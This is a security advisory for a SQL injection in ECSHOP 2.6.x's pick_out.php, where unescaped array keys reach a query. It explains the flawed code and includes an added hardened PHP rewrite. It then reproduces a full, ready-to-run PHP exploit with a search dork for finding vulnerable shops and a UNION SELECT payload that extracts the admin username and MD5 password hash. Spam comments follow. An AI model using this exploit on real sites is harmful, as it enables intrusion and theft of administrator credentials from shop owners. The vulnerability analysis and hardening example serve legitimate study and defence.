ECSHOP shop system: insufficient input filtering leads to SQL injection

Date added:
2009-05-25

System ID:
WAVDB-01431

Affected versions:
ECSHOP 2.6.1/2.6.2

Program description:
ECSHOP is a free, open-source online shop system. It is upgraded and maintained by a professional development team that provides timely and efficient technical support, and you can customize ECSHOP to your own business requirements to add features specific to your shop.

Vulnerability analysis:

The file includes/init.php checks get_magic_quotes_gpc(); if it is off, it calls addslashes_deep():

// includes/init.php
if (!get_magic_quotes_gpc())
{
    if (!empty($_GET))
    {
        $_GET  = addslashes_deep($_GET);
    }
    if (!empty($_POST))
    {
        $_POST = addslashes_deep($_POST);
    }
 
    $_COOKIE   = addslashes_deep($_COOKIE);
    $_REQUEST  = addslashes_deep($_REQUEST);
}
 
addslashes_deep() in includes/lib_base.php ultimately processes the data with addslashes():
 
// includes/lib_base.php
function addslashes_deep($value)
{
    if (empty($value))
    {
        return $value;
    }
    else
    {
        return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);
    // only the array values are processed, never the keys :)
    }
}
 
Now look at the code that actually causes the vulnerability, in pick_out.php:
 
// pick_out.php
if (!empty($_GET['attr']))
{
    foreach($_GET['attr'] as $key => $value)
    {
        $key = intval($key);
        $_GET['attr'][$key] = htmlspecialchars($value);
        // foreach iterates over a copy of the array, so this assignment does not touch the
        // original keys and values; an arbitrary key can therefore be introduced :)
        // a slip in the programmer's logic?
    }
}
...
        foreach ($_GET['attr'] AS $key => $value)
        {
            $attr_url .= '&attr[' . $key . ']=' . $value;
 
            $attr_picks[] = $key;
            if ($i > 0)
            {
                if (empty($goods_result))
                {
                    break;
                }
                // the key is used for the injection :)
                $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");

Because $key is not processed when magic_quotes_gpc=off, and the array assignment has a logic error, the result is an injection vulnerability :)
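As an added, defensive illustration (not ECSHOP's own code), the PHP below reproduces the two behaviours the analysis relies on and shows one hardened rewrite: escaping only array values leaves the keys untouched, reassigning inside a foreach leaves the original hostile key in place, and a fresh array built from integer keys plus a parameterized query removes the problem. The function names addslashes_deep_values_only, vulnerable_normalize, hardened_normalize and build_attr_query, the table name ecs_goods_attr and the sample input are this example's own constructions.

```php
<?php
// Added example, not ECSHOP code. Demonstrates why value-only escaping and
// in-loop reassignment leave attacker-controlled array keys intact, and how
// a hardened version handles the same input. All input below is constructed.

// Same behaviour as ECSHOP's addslashes_deep(): recurses into values only.
function addslashes_deep_values_only($value)
{
    if (empty($value)) {
        return $value;
    }
    return is_array($value)
        ? array_map('addslashes_deep_values_only', $value)
        : addslashes($value);
}

// Vulnerable pattern from pick_out.php: foreach walks a copy, and assigning
// $attr[intval($key)] adds a new integer key instead of replacing the original.
function vulnerable_normalize(array $attr): array
{
    foreach ($attr as $key => $value) {
        $key = intval($key);
        $attr[$key] = htmlspecialchars($value);
    }
    return $attr;
}

// Hardened rewrite: build a fresh array so that only purely numeric keys
// survive, and keep the raw value for use as a bound parameter later.
function hardened_normalize(array $attr): array
{
    $clean = [];
    foreach ($attr as $key => $value) {
        if (!is_string($value) || !ctype_digit((string) $key)) {
            continue; // drop anything that is not a plain numeric attr_id
        }
        $clean[(int) $key] = $value;
    }
    return $clean;
}

// Hardened query construction: placeholders for every user-derived value,
// so neither the key nor the value is ever spliced into the SQL string.
function build_attr_query(array $goodsIds, int $attrId, string $attrValue): array
{
    $placeholders = implode(',', array_fill(0, count($goodsIds), '?'));
    $sql = "SELECT goods_id FROM ecs_goods_attr"
         . " WHERE goods_id IN ($placeholders) AND attr_id = ? AND attr_value = ?";
    $params = array_merge(array_map('intval', $goodsIds), [$attrId, $attrValue]);
    return [$sql, $params];
}

// Constructed sample: one legitimate numeric key and one hostile non-numeric key.
$sample = ["3" => "red", "' OR 1=1 -- " => "x"];

// Value-only escaping: the hostile key is still among the keys.
var_dump(array_keys(addslashes_deep_values_only($sample)));

// Vulnerable loop: the hostile key survives and a new key 0 is added beside it.
var_dump(array_keys(vulnerable_normalize($sample)));

// Hardened loop: only the integer key 3 remains.
$clean = hardened_normalize($sample);
var_dump(array_keys($clean));

// The query is built from placeholders; the values travel as parameters.
foreach ($clean as $attrId => $attrValue) {
    [$sql, $params] = build_attr_query([10, 11], $attrId, $attrValue);
    echo $sql, "\n";
    print_r($params);
}
```

Run it with `php example.php`: the first two var_dump calls show the hostile key still present, the third shows only the integer key, and the query that follows contains no user-supplied text at all. The same fresh-array pattern applies to any place where a request array's keys, not just its values, end up in SQL or in a generated URL such as $attr_url above.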

Exploit:

#!/usr/bin/php
<?php
// This program is for technical exchange only; do not use it for illegal purposes!!
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with magic_quotes_gpc = Off
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);

if ($hash)
exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
exit("Exploit Failed!\n");

function send()
{
global $host, $path;

$cmd = 'cat_id=999999&attr[%27%20UNION%20Select%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20Where%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';

$data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

Solution:
Vendor patch
ECSHOP
----
The vendor has not yet released a patch or upgrade. We recommend that users of this software follow the vendor's homepage for the latest version:
http://www.ecshop.com

Source:
Source: ryat#www.wolvez.org
Link: http://www.80vul.com

Related entries

  1. GarykPatton says:

    Hello. I think the article is really interesting. I am even interested in reading more. How soon will you update your blog?


  2. CrisBetewsky says:

    I'm glad that after surfing the web for such a long time I have found out this information. I'm really lucky.
